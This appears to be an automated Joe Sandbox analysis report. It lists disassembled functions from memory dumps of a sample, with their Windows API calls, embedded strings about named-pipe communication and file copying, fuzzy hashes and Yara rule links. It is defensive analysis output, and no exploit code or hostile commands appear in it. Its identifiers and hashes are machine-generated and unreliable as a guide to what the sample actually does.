                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CertFromHelperProv$ChainDataLocalNameStringTrustVerify$AllocFreeSignerState
                                                                                                                                                                                                                                                                    • String ID: 4$?*@`J${|}
                                                                                                                                                                                                                                                                    • API String ID: 318076659-843163469
                                                                                                                                                                                                                                                                    • Opcode ID: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction ID: 07a7e49040c28470832a96e5ee50d6d3bb65460ac79225f476d81bb8c7a89be8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69717BB0E00218AFEB14DFA5DD89B9EBBB8FB04314F10416EE515AB281DBB95944CF58
                                                                                                                                                                                                                                                                    Function 0041E190 Relevance: 19.8, APIs: 6, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 0041E231
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E288
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E2DC
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0036EE80), ref: 0041E302
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0036EE80), ref: 0041E37D
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000009), ref: 0041F2F9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Inside initCommBridge, creating pipe %s$OOBEUtils$Pipe already initialized.$Pipe name is empty.$Wrong pipe context passed %i.$\\.\pipe\
                                                                                                                                                                                                                                                                    • API String ID: 2978645861-1085201787
                                                                                                                                                                                                                                                                    • Opcode ID: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction ID: aaa71bcc0c1ad3f749e7ec319ae41c39833817b2d272478ea5ed4507fdbc246a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CA10134700300ABDB24DF66DC9AF9A77A8AB05701F14056FE905972D1DB78F990CBAE
                                                                                                                                                                                                                                                                    Function 004274E0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 427fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,BB40E64E,?,00000000,?,?,?,00000000,0049994D,000000FF,?,00406D2F), ref: 0042751A
                                                                                                                                                                                                                                                                      • Part of subcall function 004270D0: PathRemoveFileSpecW.SHLWAPI(00000000,?,?,?,?,?,?,00000000,0049994D,000000FF), ref: 0042714C
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathIsDirectoryW.SHLWAPI(?,?,0040653E), ref: 00427283
                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,0049994D,000000FF), ref: 004275CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 004275E9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 00427637
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,0049994D,000000FF), ref: 00427678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Path$ErrorExistsLast$AttributesCopyDirectoryRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: Failed to copy file at the destination:'%s'. LastError: %d$FileUtils$OOBEUtils$Source file does not exist in CopyFileFromSourceToDestination
                                                                                                                                                                                                                                                                    • API String ID: 3678581443-2441349454
                                                                                                                                                                                                                                                                    • Opcode ID: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction ID: 304be064ac5706b44c2d59a599f2d95f36f10b52853653852536ae88b2003d00
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE1F471F002249BCB14DF69ED85BAEB7B5FB45710F50422EE411A7390DB38AD41CBA9
                                                                                                                                                                                                                                                                    Function 0041F360 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 146filesleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F38A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F39F
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,?,?,?), ref: 0041F3B6
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 0041F3CC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F3D6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite$Sleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Number of retries to write to pipe exhausted with last error = %lu. Aborting write on pipe %p$OOBEUtils$Write failed or else (No of bytes written > data). Aborting write on pipe %p , errno: %lu
                                                                                                                                                                                                                                                                    • API String ID: 2338600601-2345992799
                                                                                                                                                                                                                                                                    • Opcode ID: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction ID: bbdbd7131a9a05eaf625d8743bffc745cebe138b644272fe07d0d675cb0cef45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13411635B00208BBDB10DFA69C42BBF7B68EB55721F1001BBF815A32C0DA746D4087A8
                                                                                                                                                                                                                                                                    Function 004163F0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,00404D5E,?), ref: 00416418
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 004164B4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004164CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041651E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting Native string to UTF8 string$Failed to convert WideCharToMultiByte. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 203985260-2236274340
                                                                                                                                                                                                                                                                    • Opcode ID: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction ID: 716146f1c0389004c4db2de1f4adde63d4e0a6c81021537d3ce57664b142a41d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28417B3578031477DA20AF1AAC47FEA7794EB42B21F2400BBFD09632D0D9696D4487AD
                                                                                                                                                                                                                                                                    Function 00403C90 Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 137sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Problem initializing Connection Channel. Quitting., xrefs: 00403D11
                                                                                                                                                                                                                                                                    • Communication is open on the other pipe. Closing the static guid and re-opening for new clients..., xrefs: 00403DF4
                                                                                                                                                                                                                                                                    • Failed to initiate communication, xrefs: 00403DCB
                                                                                                                                                                                                                                                                    • Success:Initializing Connection Channel with Service with pipename: %s, xrefs: 00403D73
                                                                                                                                                                                                                                                                    • Successfully initiated communication, xrefs: 00403DAA
                                                                                                                                                                                                                                                                    • Initializing1 Connection Channel with Service with pipename: %s, xrefs: 00403CD0
                                                                                                                                                                                                                                                                    • Failed to create the connection channel, xrefs: 00403D34
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                    • String ID: Communication is open on the other pipe. Closing the static guid and re-opening for new clients...$Failed to create the connection channel$Failed to initiate communication$Initializing1 Connection Channel with Service with pipename: %s$Problem initializing Connection Channel. Quitting.$Success:Initializing Connection Channel with Service with pipename: %s$Successfully initiated communication
                                                                                                                                                                                                                                                                    • API String ID: 3472027048-2173017273
                                                                                                                                                                                                                                                                    • Opcode ID: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction ID: 5187b662ea0dd10bef7ca44164715a625855074a8d72d76878ed54e6067e5788
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9141F170600200EFCB10DF19DC89B5A7BA8AF49705F1440BAE909BB3D1CB78ED44CBA9
                                                                                                                                                                                                                                                                    Function 00418B10 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418B88
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418BAF
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00418C74
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418C8E
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418D23
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00418D30
                                                                                                                                                                                                                                                                      • Part of subcall function 0046877A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468786
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 1871079455-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction ID: 2b18787ee60dced21a1ee80d710d234eacb2e1acb53e15705c8ae09ecf607236
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD16FB1E002189FDB00DFA5C984BDEBBB5BF58314F14406EE805A7391EB78AD45CB99
                                                                                                                                                                                                                                                                    Function 0270E841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0270E960
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0270EA6E
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0270EBC0
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0270EBDB
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 0275174e13d2e9d91b3a12f051e8f4617d943602b80e7701a0e69409b5061bbe
                                                                                                                                                                                                                                                                    • Instruction ID: 72deadeedc62644f95ff928cd87f5ad674e842da7ddea842ef949fbba30705e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0275174e13d2e9d91b3a12f051e8f4617d943602b80e7701a0e69409b5061bbe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B13771C00209DFCF25DFA4C884AAEBBF6FF08314B14499AE8156B291D771DA59CF92
                                                                                                                                                                                                                                                                    Function 004013E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004013E5
                                                                                                                                                                                                                                                                      • Part of subcall function 0046873A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468746
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401519
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Started, xrefs: 004015A6
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Started, xrefs: 0040168F
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Returning from the worker thread, xrefs: 0040173D
